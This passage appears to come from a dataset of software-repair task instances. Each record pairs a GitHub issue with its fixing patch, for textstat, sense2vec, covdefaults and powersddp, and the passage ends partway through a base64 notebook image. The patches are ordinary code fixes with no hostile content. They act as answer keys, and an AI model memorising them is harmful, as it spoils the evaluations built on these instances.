``` | 2022-11-19T21:47:21 | 0.0 | [] | [] |
||
textstat/textstat | textstat__textstat-198 | 0ed2dda9d1f68abbdf4109861fa18f7fa043930c | diff --git a/Pipfile b/Pipfile
index 7ba1b18..9a1a58b 100644
--- a/Pipfile
+++ b/Pipfile
@@ -6,6 +6,7 @@ name = "pypi"
[packages]
Pyphen = "*"
"repoze.lru" = "*"
+setuptools = "*"
[dev-packages]
codespell = "*"
diff --git a/requirements.txt b/requirements.txt
index 23a8e8d..3bda01d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,1 +1,2 @@
Pyphen
+setuptools
diff --git a/setup.py b/setup.py
index 06b46d9..b305aef 100644
--- a/setup.py
+++ b/setup.py
@@ -4,24 +4,27 @@
setup(
name='textstat',
packages=['textstat'],
- version='0.7.3',
+ version='0.7.4',
description='Calculate statistical features from text',
author='Shivam Bansal, Chaitanya Aggarwal',
author_email='[email protected]',
- url='https://github.com/shivam5992/textstat',
+ url='https://github.com/textstat/textstat',
long_description=open('README.md', encoding='utf-8').read(),
long_description_content_type='text/markdown',
package_data={'': ['easy_word_list']},
include_package_data=True,
- install_requires=['pyphen'],
+ install_requires=['pyphen', 'setuptools'],
license='MIT',
python_requires=">=3.6",
classifiers=(
"Programming Language :: Python",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
+ "Programming Language :: Python :: 3.11",
+ "Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3 :: Only",
"Intended Audience :: Developers",
"Intended Audience :: Education",
| Python 3.12 compat fix
With Python 3.12 I get the following error.
```
File ~\AppData\Local\Programs\Python\Python312\Lib\site-packages\textstat\textstat.py:7
4 from collections import Counter
5 from typing import Union, List, Set
----> 7 import pkg_resources
8 from functools import lru_cache
9 from pyphen import Pyphen
ModuleNotFoundError: No module named 'pkg_resources'
```
I think this is due to the following change:
- [PEP 632](https://peps.python.org/pep-0632/)
- [gh-95299](https://docs.python.org/3/whatsnew/3.12.html#:~:text=%2C%20setuptools%2C-,pkg_resources,-%2C%20and%20easy_install%20will)
I have not tested the fix.
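The patch above takes the pragmatic route of declaring `setuptools` as a dependency so `pkg_resources` stays importable. For reference, a dependency-free alternative is the stdlib `importlib.resources` API — a minimal sketch only (the package/resource names here are illustrative; only `easy_word_list` appears in textstat's `package_data`):

```python
from importlib.resources import files  # stdlib since 3.9

def read_package_text(package: str, resource: str) -> str:
    # importlib.resources ships with the standard library, so it keeps
    # working on Python 3.12, where setuptools (and with it pkg_resources)
    # is no longer installed by default.
    return files(package).joinpath(resource).read_text(encoding="utf-8")
```

For textstat this would replace the `pkg_resources` lookup used to load its word-list data file; everything beyond that file name is an assumption here.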
| 2024-01-09T14:39:39 | 0.0 | [] | [] |
|||
explosion/sense2vec | explosion__sense2vec-157 | eb53bf467ee1a02b333ca6f43afeb542fa58a49f | diff --git a/sense2vec/sense2vec.py b/sense2vec/sense2vec.py
index bb157f5..1e1cf8f 100644
--- a/sense2vec/sense2vec.py
+++ b/sense2vec/sense2vec.py
@@ -3,6 +3,7 @@
from spacy.vectors import Vectors
from spacy.strings import StringStore
from spacy.util import SimpleFrozenDict
+from thinc.api import NumpyOps
import numpy
import srsly
@@ -247,7 +248,11 @@ def get_other_senses(
result = []
key = key if isinstance(key, str) else self.strings[key]
word, orig_sense = self.split_key(key)
- versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
+ versions = (
+ set([word, word.lower(), word.upper(), word.title()])
+ if ignore_case
+ else [word]
+ )
for text in versions:
for sense in self.senses:
new_key = self.make_key(text, sense)
@@ -270,7 +275,11 @@ def get_best_sense(
sense_options = senses or self.senses
if not sense_options:
return None
- versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
+ versions = (
+ set([word, word.lower(), word.upper(), word.title()])
+ if ignore_case
+ else [word]
+ )
freqs = []
for text in versions:
for sense in sense_options:
@@ -304,6 +313,9 @@ def from_bytes(self, bytes_data: bytes, exclude: Sequence[str] = tuple()):
"""
data = srsly.msgpack_loads(bytes_data)
self.vectors = Vectors().from_bytes(data["vectors"])
+ # Pin vectors to the CPU so that we don't end up comparing
+ # numpy and cupy arrays.
+ self.vectors.to_ops(NumpyOps())
self.freqs = dict(data.get("freqs", []))
self.cfg.update(data.get("cfg", {}))
if "strings" not in exclude and "strings" in data:
@@ -340,6 +352,9 @@ def from_disk(self, path: Union[Path, str], exclude: Sequence[str] = tuple()):
freqs_path = path / "freqs.json"
cache_path = path / "cache"
self.vectors = Vectors().from_disk(path)
+ # Pin vectors to the CPU so that we don't end up comparing
+ # numpy and cupy arrays.
+ self.vectors.to_ops(NumpyOps())
self.cfg.update(srsly.read_json(path / "cfg"))
if freqs_path.exists():
self.freqs = dict(srsly.read_json(freqs_path))
| s2v standalone breaks if require_gpu() is called from spacy (cupy)
I am using spacy for NER, and later the S2V standalone on a smaller portion of the NER hits.
In the class that implements the NER model, there is a call to require_gpu to ensure transformer inference is fast. Attempting to use the s2v standalone in the same process afterwards results in an exception from cupy complaining about implicit conversion from the cupy tensor to a numpy array.
**Code snippet:**
```
import spacy
spacy.require_gpu()
import sense2vec
s2v = sense2vec.Sense2Vec().from_disk("s2v_reddit_2019_lg")
s2v.most_similar("Bart_Simpson|PERSON") #<-- exception raised here
```
**Traceback:**
```
TypeError Traceback (most recent call last)
Cell In[2], line 7
3 import sense2vec
5 s2v = sense2vec.Sense2Vec().from_disk("s2v_reddit_2019_lg")
----> 7 s2v.most_similar("Bart_Simpson|PERSON")
File [c:\Users\LPB\anaconda3\envs\sherlock\lib\site-packages\sense2vec\sense2vec.py:226](file:///C:/Users/LPB/anaconda3/envs/sherlock/lib/site-packages/sense2vec/sense2vec.py:226), in Sense2Vec.most_similar(self, keys, n, batch_size)
224 # Always ask for more because we'll always get the keys themselves
225 n = min(len(self.vectors), n + len(keys))
--> 226 rows = numpy.asarray(self.vectors.find(keys=keys))
227 vecs = self.vectors.data[rows]
228 average = vecs.mean(axis=0, keepdims=True)
File cupy\_core\core.pyx:1397, in cupy._core.core.ndarray.__array__()
TypeError: Implicit conversion to a NumPy array is not allowed. Please use `.get()` to construct a NumPy array explicitly.
```
**Versions:**
cupy-cuda112 10.6.0
sense2vec 2.0.1
spacy 3.4.3
spacy-alignments 0.8.6
spacy-transformers 1.1.8
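The eventual fix (the `to_ops(NumpyOps())` calls in the patch) pins the loaded vectors to the CPU so `numpy.asarray` never receives a cupy array. The contract cupy enforces is that device arrays must be copied to the host explicitly via `.get()`; a small CPU-only helper illustrating that contract (the helper name is illustrative, not part of sense2vec):

```python
import numpy

def ensure_numpy(array):
    # cupy.ndarray exposes .get() to copy device memory to the host and
    # raises TypeError on implicit numpy conversion; plain sequences and
    # numpy arrays pass straight through numpy.asarray.
    if hasattr(array, "get") and not isinstance(array, numpy.ndarray):
        return numpy.asarray(array.get())
    return numpy.asarray(array)
```

Pinning the vectors once at load time, as the patch does, avoids scattering conversions like this across every lookup.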
| I'll note also that the problem doesn't occur if a sufficient cache is present, since there is no KNN calculation performed.
Thanks for the report, we'll take a look! | 2023-04-17T11:01:43 | 0.0 | [] | [] |
||
explosion/sense2vec | explosion__sense2vec-139 | 3c191aee178f4cbb0314b616622189c1d1c45876 | diff --git a/sense2vec/sense2vec.py b/sense2vec/sense2vec.py
index 9067ef6..bb157f5 100644
--- a/sense2vec/sense2vec.py
+++ b/sense2vec/sense2vec.py
@@ -247,7 +247,7 @@ def get_other_senses(
result = []
key = key if isinstance(key, str) else self.strings[key]
word, orig_sense = self.split_key(key)
- versions = [word, word.upper(), word.title()] if ignore_case else [word]
+ versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
for text in versions:
for sense in self.senses:
new_key = self.make_key(text, sense)
@@ -270,7 +270,7 @@ def get_best_sense(
sense_options = senses or self.senses
if not sense_options:
return None
- versions = [word, word.upper(), word.title()] if ignore_case else [word]
+ versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
freqs = []
for text in versions:
for sense in sense_options:
| ignore_case option for get_best_sense and get_other_senses does not check for lowercase
The `ignore_case` option for `get_best_sense` and `get_other_senses` claims that: "ignore_case (bool): Check for uppercase, lowercase and titlecase." However, `ignore_case` does not check for lowercase - it only checks for the version of the word passed in, upper-case, and title-case (https://github.com/explosion/sense2vec/blob/master/sense2vec/sense2vec.py#L250). It should also lower-case the word so that it correctly ignores case.
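The one-line fix in the patch is easiest to see side by side — the old list literal can never contain the lowercase form, and the new `set` both adds it and deduplicates overlapping casings:

```python
def case_versions_old(word):
    # behaviour before the patch: the lowercase form is never generated
    return [word, word.upper(), word.title()]

def case_versions_fixed(word):
    # behaviour after the patch: lower() is added, and set() collapses
    # duplicates such as "Duck" == "Duck".title()
    return set([word, word.lower(), word.upper(), word.title()])
```

For a key like `WORD|NOUN`, only the fixed version will also probe `word|NOUN`.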
| 2021-06-07T21:03:32 | 0.0 | [] | [] |
|||
asottile/covdefaults | asottile__covdefaults-97 | 9d6e5c5c20108daa74b72783ced5452fa84678da | diff --git a/README.md b/README.md
index 08a0078..2761af0 100644
--- a/README.md
+++ b/README.md
@@ -67,7 +67,7 @@ exclude_lines =
^\s*raise$
# typing-related code
- ^if (False|TYPE_CHECKING):
+ ^\s*if (False|TYPE_CHECKING):
: \.\.\.(\s*#.*)?$
^ +\.\.\.$
-> ['"]?NoReturn['"]?:
diff --git a/covdefaults.py b/covdefaults.py
index 55a5120..09b40a9 100644
--- a/covdefaults.py
+++ b/covdefaults.py
@@ -93,7 +93,7 @@ def _version_pragmas(
r'^\s*return NotImplemented\b',
r'^\s*raise$',
# typing-related code
- r'^if (False|TYPE_CHECKING):',
+ r'^\s*if (False|TYPE_CHECKING):',
r': \.\.\.(\s*#.*)?$',
r'^ +\.\.\.$',
r'-> [\'"]?NoReturn[\'"]?:',
| Class-level `if TYPE_CHECKING` is reported as uncovered
Example:
```python
from typing import TYPE_CHECKING
class Some:
if TYPE_CHECKING:
some_attr: str
```
Here `if TYPE_CHECKING:` is reported to be uncovered.
<img width="679" alt="Screenshot 2022-12-03 at 14 21 00" src="https://user-images.githubusercontent.com/4660275/205438416-b995b5a3-a8a1-4553-ba20-b4246650c26b.png">
While, other rules have `\s*` prefix. I have a PR ready.
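The missing `\s*` is easy to confirm with `re` against the indented class-body line from the example above (coverage applies these exclude patterns line by line):

```python
import re

OLD = r'^if (False|TYPE_CHECKING):'     # pattern before the fix
NEW = r'^\s*if (False|TYPE_CHECKING):'  # pattern after the fix

line = "    if TYPE_CHECKING:"  # class-level guard, indented four spaces

assert re.search(OLD, line) is None  # old pattern never matches indented code
assert re.search(NEW, line) is not None
assert re.search(NEW, "if TYPE_CHECKING:") is not None  # top level still covered
```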
| 2022-12-03T11:28:41 | 0.0 | [] | [] |
|||
asottile/covdefaults | asottile__covdefaults-57 | b33cb96b0b06669148e156af0a4c0c343a97b859 | diff --git a/README.md b/README.md
index 281cd5a..4b25ec2 100644
--- a/README.md
+++ b/README.md
@@ -76,6 +76,13 @@ exclude_lines =
if __name__ == ['"]__main__['"]:$
# additional platform related pragmas (see below)
+ # additional version related pragmas (see below)
+partial_branches =
+ # a more strict default pragma
+ \# pragma: no cover\b
+
+ # our version pragmas
+ \# pragma: (>=?|<=?|==|!=)\d+\.\d+ cover\b'
```
### platform specific `# pragma: no cover`
@@ -123,6 +130,28 @@ note here that `# pragma: win32 cover` will become a "no cover" for everything
which is not `win32` -- whereas the `# pragma: win32 no cover` will be a
"no cover" only on `win32`.
+### version specific `# pragma: no cover`
+
+several `# pragma: no cover` tags will be added automatically based on the
+platform and implementation.
+
+these will be in the form of:
+
+```python
+# pragma: >=#.# cover
+```
+
+where the comparison operator is one of `>`, `>=`, `<`, `<=`, `==`, `!=`
+
+for example:
+
+```python
+if sys.version_info >= (3, 9): # pragma: >=3.9 cover
+ print('3.9+')
+else: # pragma: <3.9 cover
+ print('old')
+```
+
### overriding options
several of the options can be overridden / extended in your coverage
diff --git a/covdefaults.py b/covdefaults.py
index 981a9eb..cd863c5 100644
--- a/covdefaults.py
+++ b/covdefaults.py
@@ -27,6 +27,54 @@ def _plat_impl_pragmas() -> List[str]:
return ret
+def _lt(n: int) -> str:
+ n_s = str(n)
+ digit = r'\d'
+
+ parts = [
+ f'{n_s[:i]}[0-{int(n_s[i]) - 1}]{len(n_s[i + 1:]) * digit}'
+ for i in range(len(n_s))
+ if n_s[i] != '0'
+ ]
+ if len(n_s) > 1:
+ parts.append(f'{digit}{{1,{len(n_s) - 1}}}')
+
+ return f'({"|".join(parts)})'
+
+
+def _gt(n: int) -> str:
+ n_s = str(n)
+ digit = r'\d'
+
+ parts = [
+ f'{n_s[:i]}[{int(n_s[i]) + 1}-9]{len(n_s[i + 1:]) * digit}'
+ for i in range(len(n_s))
+ if n_s[i] != '9'
+ ]
+ parts.append(f'{digit}{{{len(n_s) + 1},}}')
+
+ return f'({"|".join(parts)})'
+
+
+def _version_pragmas(
+ major: int = sys.version_info[0],
+ minor: int = sys.version_info[1],
+) -> List[str]:
+ return [
+ # <
+ fr'# pragma: <=?{_lt(major)}\.\d+ cover\b',
+ fr'# pragma: <=?{major}\.{_lt(minor)} cover\b',
+ fr'# pragma: <{major}\.{minor} cover\b',
+ # >
+ fr'# pragma: >=?{_gt(major)}\.\d+ cover\b',
+ fr'# pragma: >=?{major}\.{_gt(minor)} cover\b',
+ fr'# pragma: >{major}\.{minor} cover\b',
+ # != / ==
+ fr'# pragma: !={major}\.{minor} cover\b',
+ fr'# pragma: ==(?!{major}\.{minor})\d+\.\d+ cover\b',
+ ]
+
+
OPTIONS: Tuple[Tuple[str, Any], ...] = (
('run:branch', True),
@@ -53,6 +101,15 @@ def _plat_impl_pragmas() -> List[str]:
# non-runnable code
r'^if __name__ == [\'"]__main__[\'"]:$',
*_plat_impl_pragmas(),
+ *_version_pragmas(),
+ ],
+ ),
+ (
+ 'report:partial_branches',
+ [
+ r'# pragma: no branch\b',
+ # version specific no cover
+ r'# pragma: (>=?|<=?|==|!=)\d+\.\d+ cover\b',
],
),
)
| version specific coverage pragmas
might be a fun little regex game, but it would be nice to support `# pragma: >=3.7 no cover` or some such
| 2021-11-28T04:46:08 | 0.0 | [] | [] |
|||
asottile/covdefaults | asottile__covdefaults-50 | cafccbdab43191a9fbf558e73d2f04456d9d5282 | diff --git a/README.md b/README.md
index ba411e1..281cd5a 100644
--- a/README.md
+++ b/README.md
@@ -46,10 +46,8 @@ plugins = ["covdefaults"]
branch = True
source = .
omit =
- */.tox/*
*/__main__.py
*/setup.py
- */venv*/*
```
### `[coverage:report]`
@@ -144,11 +142,11 @@ to the defaults provided by `covdefaults`.
```ini
[covdefaults]
-subtract_omit = */.tox/*
+subtract_omit = */__main__.py
```
-this will result in `*/.tox/*` not being `omit`ted (`*/.tox/*` is among the
-defaults provided by `covdefaults`).
+this will result in `*/__main__.py` not being `omit`ted (`*/__main__.py` is
+among the defaults provided by `covdefaults`).
#### `run:source`
diff --git a/covdefaults.py b/covdefaults.py
index dde93de..57cd55e 100644
--- a/covdefaults.py
+++ b/covdefaults.py
@@ -34,7 +34,7 @@ def _plat_impl_pragmas(): # type: () -> List[str]
('report:skip_covered', True),
)
EXTEND = (
- ('run:omit', ['*/.tox/*', '*/__main__.py', '*/setup.py', '*/venv*/*']),
+ ('run:omit', ['*/__main__.py', '*/setup.py']),
(
'report:exclude_lines',
[
diff --git a/setup.cfg b/setup.cfg
index d0e2043..12d10c7 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -24,7 +24,7 @@ classifiers =
[options]
py_modules = covdefaults
install_requires =
- coverage>=4.5
+ coverage>=6.0.2
python_requires = >=3.6.1
[bdist_wheel]
| coverage 6.x: might not need site-packages excludes ?
| 2021-10-15T23:55:51 | 0.0 | [] | [] |
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-18 | 4ce537810d7f476196f38e57a3346a488e96461d | diff --git a/CITATION.cff b/CITATION.cff
index d98da6d..3da8f7d 100644
--- a/CITATION.cff
+++ b/CITATION.cff
@@ -15,8 +15,8 @@ authors:
title: "PPEE_210092: Power System Stochastic Dual Dynamic Programming Library"
-version: 0.0.1
+version: 0.0.2
-date-released: 2021-08-22
+date-released: 2021-08-25
url: "https://github.com/ettoreaquino/powersddp"
diff --git a/Notebook.ipynb b/Notebook.ipynb
index 1eb6b54..14a0d62 100644
--- a/Notebook.ipynb
+++ b/Notebook.ipynb
@@ -2,34 +2,19 @@
"cells": [
{
"cell_type": "code",
- "execution_count": 2,
+ "execution_count": null,
"id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
"metadata": {},
"outputs": [],
"source": [
"import powersddp as psddp\n",
"\n",
- "\n",
- "data = {'load': [100, 15, 50],\n",
- " 'discretizations': 3,\n",
- " 'stages': 3,\n",
- " 'scenarios': 2,\n",
- " 'outage_cost': 500,\n",
- " 'hydro-units': [{'name': 'HU1',\n",
- " 'v_max': 100,\n",
- " 'v_min': 20,\n",
- " 'prod': 0.95,\n",
- " 'flow_max': 60,\n",
- " 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],\n",
- " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
- " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
- "\n",
- "TestSystem = psddp.PowerSystem(data=data)"
+ "TestSystem = psddp.PowerSystem(path='system.yml')"
]
},
{
"cell_type": "code",
- "execution_count": 6,
+ "execution_count": null,
"id": "0b41801a-dc45-4777-a2ec-1294c91890cc",
"metadata": {
"scrolled": true,
@@ -37,7 +22,7 @@
},
"outputs": [],
"source": [
- "operation = TestSystem.dispatch()"
+ "operation = TestSystem.dispatch(solver='ulp', scenario=1, plot=True)"
]
},
{
@@ -88,7 +73,7 @@
},
{
"cell_type": "code",
- "execution_count": 16,
+ "execution_count": null,
"id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
"metadata": {},
"outputs": [],
@@ -228,1024 +213,12 @@
},
{
"cell_type": "code",
- "execution_count": 17,
+ "execution_count": null,
"id": "2b718ada-dd91-4cb6-a31c-f36b61674065",
"metadata": {
"tags": []
},
- "outputs": [
- {
- "data": {
-        ... ≈980 lines of Plotly "Future Cost Function" figure JSON elided: three cost curves over Final Volume [hm3] = [20, 60, 100] vs $/MW — Stage 1 y = [6725, 7.75, 0], Stage 2 y = [11787.5, 226.93, 0.62], Stage 3 y = [15425, 576.31, 161.68] — plus the default Plotly template and subplot axis layout ...,
-       "image/png": "<base64-encoded PNG render of the figure elided>"
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